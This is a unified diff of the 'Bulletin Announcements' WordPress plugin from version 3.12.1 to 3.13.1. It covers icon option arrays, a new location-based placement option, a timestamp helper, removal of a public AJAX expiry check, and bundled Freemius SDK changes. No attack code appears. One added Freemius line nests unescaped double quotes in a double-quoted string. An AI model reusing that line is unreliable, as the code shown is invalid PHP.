-    'imageSet'=> 'solid'
+    'value'     => 'book-s',
+    'label'     => esc_html__( 'Book', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/book-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'briefcase-o',
-    'label' => esc_html__( 'Briefcase', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/briefcase-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'briefcase-o',
+    'label'     => esc_html__( 'Briefcase', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/briefcase-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'briefcase-s',
-    'label' => esc_html__( 'Briefcase', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/briefcase-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'briefcase-s',
+    'label'     => esc_html__( 'Briefcase', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/briefcase-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'calendar-o',
-    'label' => esc_html__( 'Calendar', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/calendar-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'calendar-o',
+    'label'     => esc_html__( 'Calendar', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/calendar-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'calendar-s',
-    'label' => esc_html__( 'Calendar', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/calendar-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'calendar-s',
+    'label'     => esc_html__( 'Calendar', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/calendar-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'chat-o',
-    'label' => esc_html__( 'Chat', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/chat-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'chat-o',
+    'label'     => esc_html__( 'Chat', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/chat-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'chat-s',
-    'label' => esc_html__( 'Chat', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/chat-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'chat-s',
+    'label'     => esc_html__( 'Chat', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/chat-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'check-o',
-    'label' => esc_html__( 'Check circle', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/check-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'check-o',
+    'label'     => esc_html__( 'Check circle', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/check-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'check-s',
-    'label' => esc_html__( 'Check circle', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/check-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'check-s',
+    'label'     => esc_html__( 'Check circle', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/check-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'clip-o',
-    'label' => esc_html__( 'Clip', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/clip-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'clip-o',
+    'label'     => esc_html__( 'Clip', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/clip-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'clip-s',
-    'label' => esc_html__( 'Clip', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/clip-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'clip-s',
+    'label'     => esc_html__( 'Clip', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/clip-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'clock-o',
-    'label' => esc_html__( 'Clock', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/clock-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'clock-o',
+    'label'     => esc_html__( 'Clock', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/clock-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'clock-s',
-    'label' => esc_html__( 'Clock', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/clock-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'clock-s',
+    'label'     => esc_html__( 'Clock', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/clock-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'cookie-o',
-    'label' => esc_html__( 'Cookie', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/cookie-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'cookie-o',
+    'label'     => esc_html__( 'Cookie', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/cookie-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'cookie-s',
-    'label' => esc_html__( 'Cookie', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/cookie-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'cookie-s',
+    'label'     => esc_html__( 'Cookie', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/cookie-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'happy-o',
-    'label' => esc_html__( 'Emotion happy', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/happy-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'happy-o',
+    'label'     => esc_html__( 'Emotion happy', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/happy-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'happy-s',
-    'label' => esc_html__( 'Emotion happy', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/happy-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'happy-s',
+    'label'     => esc_html__( 'Emotion happy', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/happy-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'heart-o',
-    'label' => esc_html__( 'Heart', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/heart-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'heart-o',
+    'label'     => esc_html__( 'Heart', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/heart-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'heart-s',
-    'label' => esc_html__( 'Heart', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/heart-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'heart-s',
+    'label'     => esc_html__( 'Heart', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/heart-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'info-o',
-    'label' => esc_html__( 'Info', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/info-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'info-o',
+    'label'     => esc_html__( 'Info', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/info-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'info-s',
-    'label' => esc_html__( 'Info', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/info-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'info-s',
+    'label'     => esc_html__( 'Info', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/info-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'key-o',
-    'label' => esc_html__( 'Key', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/key-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'key-o',
+    'label'     => esc_html__( 'Key', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/key-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'key-s',
-    'label' => esc_html__( 'Key', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/key-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'key-s',
+    'label'     => esc_html__( 'Key', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/key-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'location-o',
-    'label' => esc_html__( 'Location', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/location-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'location-o',
+    'label'     => esc_html__( 'Location', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/location-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'location-s',
-    'label' => esc_html__( 'Location', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/location-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'location-s',
+    'label'     => esc_html__( 'Location', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/location-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'moon-o',
-    'label' => esc_html__( 'Moon', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/moon-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'moon-o',
+    'label'     => esc_html__( 'Moon', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/moon-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'moon-s',
-    'label' => esc_html__( 'Moon', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/moon-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'moon-s',
+    'label'     => esc_html__( 'Moon', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/moon-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'music-o',
-    'label' => esc_html__( 'Music', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/music-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'music-o',
+    'label'     => esc_html__( 'Music', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/music-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'music-s',
-    'label' => esc_html__( 'Music', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/music-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'music-s',
+    'label'     => esc_html__( 'Music', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/music-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'notification-o',
-    'label' => esc_html__( 'Notification', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/notification-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'notification-o',
+    'label'     => esc_html__( 'Notification', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/notification-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'notification-s',
-    'label' => esc_html__( 'Notification', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/notification-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'notification-s',
+    'label'     => esc_html__( 'Notification', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/notification-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'question-o',
-    'label' => esc_html__( 'Question', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/question-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'question-o',
+    'label'     => esc_html__( 'Question', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/question-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'question-s',
-    'label' => esc_html__( 'Question', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/question-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'question-s',
+    'label'     => esc_html__( 'Question', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/question-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'rocket-o',
-    'label' => esc_html__( 'Rocket', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/rocket-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'rocket-o',
+    'label'     => esc_html__( 'Rocket', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/rocket-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'rocket-s',
-    'label' => esc_html__( 'Rocket', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/rocket-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'rocket-s',
+    'label'     => esc_html__( 'Rocket', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/rocket-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'sad-o',
-    'label' => esc_html__( 'Sad', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/sad-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'sad-o',
+    'label'     => esc_html__( 'Sad', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/sad-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'sad-s',
-    'label' => esc_html__( 'Sad', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/sad-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'sad-s',
+    'label'     => esc_html__( 'Sad', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/sad-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'star-o',
-    'label' => esc_html__( 'Star', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/star-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'star-o',
+    'label'     => esc_html__( 'Star', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/star-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'star-s',
-    'label' => esc_html__( 'Star', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/star-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'star-s',
+    'label'     => esc_html__( 'Star', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/star-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'thumbsup-o',
-    'label' => esc_html__( 'Thumbs Up', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/thumbsup-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'thumbsup-o',
+    'label'     => esc_html__( 'Thumbs Up', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/thumbsup-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'thumbsup-s',
-    'label' => esc_html__( 'Thumbs Up', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/thumbsup-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'thumbsup-s',
+    'label'     => esc_html__( 'Thumbs Up', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/thumbsup-s.svg',
+    'image_set' => 'solid',
   ],
   [
-    'value' => 'trophy-o',
-    'label' => esc_html__( 'Trophy', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/trophy-o.svg',
-    'imageSet'=> 'outline'
+    'value'     => 'trophy-o',
+    'label'     => esc_html__( 'Trophy', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/trophy-o.svg',
+    'image_set' => 'outline',
   ],
   [
-    'value' => 'trophy-s',
-    'label' => esc_html__( 'Trophy', 'bulletinwp' ),
-    'imageUrl' => $images_dir . '/icons/trophy-s.svg',
-    'imageSet'=> 'solid'
+    'value'     => 'trophy-s',
+    'label'     => esc_html__( 'Trophy', 'bulletinwp' ),
+    'image_url' => $images_dir . '/icons/trophy-s.svg',
+    'image_set' => 'solid',
   ]
 ];
--- a/bulletin-announcements/admin/views/common/tabs/placement.php
+++ b/bulletin-announcements/admin/views/common/tabs/placement.php
@@ -1,6 +1,7 @@
 <?php

 defined( 'ABSPATH' ) or exit;
+include_once BULLETINWP_PLUGIN_PATH . 'admin/views/common/constants/country-options.php';
 // Default values
 // Visible but disabled
 isset( $placement_by_content ) or $placement_by_content = 'everywhere';
@@ -107,10 +108,10 @@

         <hr class="my-4">

-        <div class="radio-group-wrapper flex flex-wrap <?php
+        <div class="radio-group-wrapper flex flex-wrap -mx-2 <?php
 echo esc_attr( ( bulletinwp_fs()->is__premium_only() ? '' : 'pro-disabled' ) );
 ?>">
-            <div class="mr-4 mb-4">
+            <div class="px-2 mb-4">
                 <label class="radio-wrapper">
                 <input id="<?php
 echo esc_attr( BULLETINWP_PLUGIN_SLUG . '-placement-by-user-everyone' );
@@ -129,7 +130,7 @@
                 </label>
             </div>

-            <div class="mr-4 mb-4">
+            <div class="px-2 mb-4">
                 <label class="radio-wrapper">
                 <input id="<?php
 echo esc_attr( BULLETINWP_PLUGIN_SLUG . '-placement-by-user-logged-in-users' );
@@ -148,7 +149,7 @@
                 </label>
             </div>

-            <div class="mr-4 mb-4">
+            <div class="px-2 mb-4">
                 <label class="radio-wrapper">
                 <input id="<?php
 echo esc_attr( BULLETINWP_PLUGIN_SLUG . '-placement-by-user-logged-out-users' );
@@ -167,7 +168,7 @@
                 </label>
             </div>

-            <div class="mr-4 mb-4">
+            <div class="px-2 mb-4">
                 <label class="radio-wrapper">
                 <input id="<?php
 echo esc_attr( BULLETINWP_PLUGIN_SLUG . '-placement-by-user-cookie-value' );
@@ -189,7 +190,7 @@
                 </label>
             </div>

-            <div class="mb-4">
+            <div class="px-2 mb-4">
                 <label class="radio-wrapper">
                 <input id="<?php
 echo esc_attr( BULLETINWP_PLUGIN_SLUG . '-placement-by-user-ip-address' );
@@ -210,6 +211,28 @@
 ?></span>
                 </label>
             </div>
+
+            <div class="px-2 mb-4">
+                <label class="radio-wrapper">
+                <input id="<?php
+echo esc_attr( BULLETINWP_PLUGIN_SLUG . '-placement-by-user-location' );
+?>"
+                        type="radio"
+                        name="placementByUser"
+                        value="geolocation"
+                        data-show-elements="<?php
+echo esc_attr( '#' . BULLETINWP_PLUGIN_SLUG . '-placement-user-location-element' );
+?>"
+                        <?php
+checked( $placement_by_user === 'geolocation' );
+?>
+                />
+                <span class="thumb"></span>
+                <span><?php
+esc_html_e( 'Based on location', 'bulletinwp' );
+?></span>
+                </label>
+            </div>
         </div>

         <?php
--- a/bulletin-announcements/bulletinwp.php
+++ b/bulletin-announcements/bulletinwp.php
@@ -4,7 +4,7 @@
  * Plugin Name: Bulletin Announcements
  * Plugin URI: https://www.rocksolidplugins.com/plugins/bulletin/
  * Description: Publish a slick announcement banner notice across your website or Woocommerce shop. Extend with icons, countdowns, placement rules and more!
- * Version: 3.12.1
+ * Version: 3.13.1
  * Author: Bulletin
  * Author URI: https://www.rocksolidplugins.com/
  * Text Domain: bulletinwp
--- a/bulletin-announcements/classes/class-bulletinwp-ajax.php
+++ b/bulletin-announcements/classes/class-bulletinwp-ajax.php
@@ -13,19 +13,15 @@
             'bulletinwp_export_bulletins',
             'bulletinwp_import_bulletins'
         ];
-        $frontend_actions = ['bulletinwp_check_expiry'];
         foreach ( $actions as $action ) {
             /**
              * For admin ajax
              */
             add_action( "wp_ajax_{$action}", array($this, $action) );
-        }
-        foreach ( $frontend_actions as $action ) {
             /**
              * For front end ajax; Only enable below if any front end ajax used
              */
-            add_action( "wp_ajax_{$action}", array($this, $action) );
-            add_action( "wp_ajax_nopriv_{$action}", array($this, $action) );
+            // add_action( "wp_ajax_nopriv_$action", array( $this, $action ) );
         }
     }

@@ -344,29 +340,4 @@
         ] );
     }

-    /**
-     * Check bulletin expiry
-     *
-     * @since 3.10.4
-     *
-     * @param void
-     * @return void
-     */
-    public function bulletinwp_check_expiry() {
-        $id = $_POST['id'];
-        $expiry_date = $_POST['expiry_date'];
-        $expiry_timestamp = new DateTime($expiry_date);
-        if ( !empty( $timezone_string = BULLETINWP::instance()->helpers->get_timezone_string() ) ) {
-            $expiry_timestamp->setTimezone( new DateTimeZone($timezone_string) );
-        }
-        $current_timestamp = current_datetime();
-        $is_expired = $expiry_timestamp < $current_timestamp;
-        wp_send_json_success( [
-            'id'           => $id,
-            'expiry_date'  => $expiry_timestamp,
-            'current_date' => $current_timestamp,
-            'expired'      => $is_expired,
-        ] );
-    }
-
 }
--- a/bulletin-announcements/classes/class-bulletinwp-frontend.php
+++ b/bulletin-announcements/classes/class-bulletinwp-frontend.php
@@ -74,7 +74,6 @@
             true
         );
         wp_localize_script( "{$plugin_slug}-frontend-scripts", 'BULLETINWP', [
-            'ajaxUrl'    => admin_url( 'admin-ajax.php' ),
             'pluginSlug' => $plugin_slug,
         ] );
     }
@@ -88,7 +87,7 @@
      * @since 1.0.0
      *
      */
-    public function insert_bulletins_by_placement( $placement, $corner_position = '' ) {
+    public function insert_bulletins_by_placement( $placement, $corner_position = null ) {
         $bulletins = [];
         if ( BULLETINWP::instance()->helpers->maybe_in_preview_mode() ) {
             if ( !empty( $bulletin_id = BULLETINWP::instance()->helpers->get_preview_mode_bulletin_id() ) && BULLETINWP::instance()->sql->get_bulletin_data( $bulletin_id, 'placement' ) === $placement ) {
@@ -162,7 +161,6 @@
             'data-header-banner-scroll'  => [],
             'data-site-has-fixed-header' => [],
             'data-fixed-header-selector' => [],
-            'data-expiry-datetime'       => [],
             'data-id'                    => [],
             'data-cycle-speed'           => [],
             'data-marquee-speed'         => [],
@@ -194,6 +192,7 @@
             'data-input-placeholder'     => [],
             'data-panel-id'              => [],
             'data-action-type'           => [],
+            'data-placement-location'    => [],
         ];
         $svg_kses = BULLETINWP::instance()->helpers->get_kses_allowed_protocols_for_svg();
         $allowed_tags = [];
--- a/bulletin-announcements/classes/class-bulletinwp-helpers.php
+++ b/bulletin-announcements/classes/class-bulletinwp-helpers.php
@@ -66,6 +66,42 @@
     }

     /**
+     * Get the adjusted timestamp
+     *
+     * @param string $datetime_string Date and time in 'Y/m/d H:i' format.
+     *
+     * @return int Unix timestamp.
+     * @since 3.13.0
+     *
+     */
+    public function get_adjusted_timestamp( $datetime_string ) {
+        if ( function_exists( 'wp_date' ) ) {
+            $timezone = $this->get_timezone_string();
+            if ( !$timezone ) {
+                // Fall back to gmt_offset if timezone_string is not set
+                $gmt_offset = get_option( 'gmt_offset' );
+                $timezone = timezone_name_from_abbr( '', $gmt_offset * 3600, 0 );
+            }
+            // Create a DateTime object for the local time
+            $datetime = new DateTime($datetime_string);
+            $datetime->setTimezone( new DateTimeZone($timezone) );
+            // Get the offset of the timezone to set the date time correctly on the cron event
+            $timezone_offset = $datetime->getOffset() / 3600;
+            if ( $timezone_offset > 0 ) {
+                $sub_hours = $timezone_offset * 2;
+                $datetime->sub( new DateInterval("PT{$sub_hours}H") );
+            } elseif ( $timezone_offset < 0 ) {
+                $add_hours = $timezone_offset * -2;
+                $datetime->add( new DateInterval("PT{$add_hours}H") );
+            }
+            $datetime = $datetime->format( 'm/d/Y H:i:s' );
+        } else {
+            $datetime = gmdate( 'm/d/Y H:i:s', strtotime( $datetime_string ) );
+        }
+        return strtotime( $datetime );
+    }
+
+    /**
      * Get bulletin link
      *
      * @param string $bulletin_id
--- a/bulletin-announcements/core/config.php
+++ b/bulletin-announcements/core/config.php
@@ -2,6 +2,6 @@

 defined( 'BULLETINWP_PLUGIN_NAME' ) or define( 'BULLETINWP_PLUGIN_NAME', 'Bulletin' );
 defined( 'BULLETINWP_PLUGIN_SLUG' ) or define( 'BULLETINWP_PLUGIN_SLUG', 'bulletinwp' );
-defined( 'BULLETINWP_PLUGIN_VERSION' ) or define( 'BULLETINWP_PLUGIN_VERSION', '3.12.1' );
+defined( 'BULLETINWP_PLUGIN_VERSION' ) or define( 'BULLETINWP_PLUGIN_VERSION', '3.13.1' );
 defined( 'BULLETINWP_PLUGIN_PATH' ) or define( 'BULLETINWP_PLUGIN_PATH', plugin_dir_path( BULLETINWP__FILE__ ) );
 defined( 'BULLETINWP_PLUGIN_WELCOME_PAGE_TRANSIENT_KEY' ) or define( 'BULLETINWP_PLUGIN_WELCOME_PAGE_TRANSIENT_KEY', '_' . BULLETINWP_PLUGIN_SLUG . '_welcome_screen_activation_redirect' );
--- a/bulletin-announcements/frontend/views/bulletins.php
+++ b/bulletin-announcements/frontend/views/bulletins.php
@@ -46,6 +46,9 @@
          data-fixed-header-selector="<?php
         echo esc_attr( $fixed_header_selector );
         ?>"
+
+         <?php
+        ?>
     >
       <?php
         $bulletin_title = ( isset( $bulletin['bulletin_title'] ) && !empty( $bulletin['bulletin_title'] ) ? $bulletin['bulletin_title'] : '' );
--- a/bulletin-announcements/modules/freemius/includes/class-freemius.php
+++ b/bulletin-announcements/modules/freemius/includes/class-freemius.php
@@ -24000,13 +24000,15 @@

             // Start trial button.
             $button = ' ' . sprintf(
-                    '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s  ➜</button></a>',
+                    '<div><a class="button button-primary" href="%s">%s  ➜</a></div>',
                     $trial_url,
                     $this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
                 );

+            $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
             $this->_admin_notices->add_sticky(
-                $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+                "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
                 'trial_promotion',
                 '',
                 'promotion'
@@ -25476,7 +25478,7 @@
                 $img_dir = WP_FS__DIR_IMG;

                 // Locate the main assets folder.
-                if ( 1 < count( $fs_active_plugins->plugins ) ) {
+                if ( ! empty( $fs_active_plugins->plugins ) ) {
                     $plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );

                     foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/bulletin-announcements/modules/freemius/includes/class-fs-plugin-updater.php
+++ b/bulletin-announcements/modules/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@

             global $wp_current_filter;

-            $current_plugin_version = $this->_fs->get_plugin_version();
-
-            if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
-                if (
-                    is_null( $this->_update_details ) ||
-                    ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
-                ) {
-                    /**
-                     * After an update, clear the stored update details and reparse the plugin's main file in order to get
-                     * the updated version's information and prevent the previous update information from showing up on the
-                     * updates page.
-                     *
-                     * @author Leo Fajardo (@leorw)
-                     * @since 2.3.1
-                     */
-                    $this->_update_details  = null;
-                    $current_plugin_version = $this->_fs->get_plugin_version( true );
-                }
+            if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+                return $transient_data;
             }

             if ( ! isset( $this->_update_details ) ) {
@@ -568,7 +552,7 @@
                     false,
                     fs_request_get_bool( 'force-check' ),
                     FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
-                    $current_plugin_version
+                    $this->_fs->get_plugin_version()
                 );

                 $this->_update_details = false;
--- a/bulletin-announcements/modules/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/bulletin-announcements/modules/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
 	/**
 	 * Class FS_Plugin_Plan
 	 *
-	 * @property FS_Pricing[] $pricing
 	 */
 	class FS_Plugin_Plan extends FS_Entity {

--- a/bulletin-announcements/modules/freemius/includes/entities/class-fs-site.php
+++ b/bulletin-announcements/modules/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
         exit;
     }

-    /**
-     * @property int $blog_id
-     */
-    #[AllowDynamicProperties]
     class FS_Site extends FS_Scope_Entity {
         /**
          * @var number
          */
         public $site_id;
         /**
+         * @var int
+         */
+        public $blog_id;
+        /**
          * @var number
          */
         public $plugin_id;
--- a/bulletin-announcements/modules/freemius/includes/entities/class-fs-user.php
+++ b/bulletin-announcements/modules/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
 			parent::__construct( $user );
 		}

+		/**
+		 * This method removes the deprecated 'is_beta' property from the serialized data.
+		 * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+		 *
+		 * @return void
+		 */
+		function __wakeup() {
+			if ( property_exists( $this, 'is_beta' ) ) {
+				// If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+				unset( $this->is_beta );
+			}
+		}
+
 		function get_name() {
 			return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
 		}
--- a/bulletin-announcements/modules/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/bulletin-announcements/modules/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
 				$menu = $this->find_main_submenu();
 			}

+			$menu_slug   = $menu['menu'][2];
 			$parent_slug = isset( $menu['parent_slug'] ) ?
-                $menu['parent_slug'] :
-                'admin.php';
+				$menu['parent_slug'] :
+				'admin.php';

-            return admin_url(
-                $parent_slug .
-                ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
-                'page=' .
-                $menu['menu'][2]
-            );
+			if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+				$parent_slug = 'admin.php';
+
+				/**
+				 * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+				 *
+				 * @author Leo Fajardo (@leorw)
+				 * @since 2.10.2
+				 */
+				global $_parent_pages;
+
+				if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+					$_parent_slug = $_parent_pages[ $menu_slug ];
+					$parent_slug  = isset( $_parent_pages[ $_parent_slug ] ) ?
+						$parent_slug :
+						$menu['parent_slug'];
+				}
+			}
+
+			return admin_url(
+				$parent_slug .
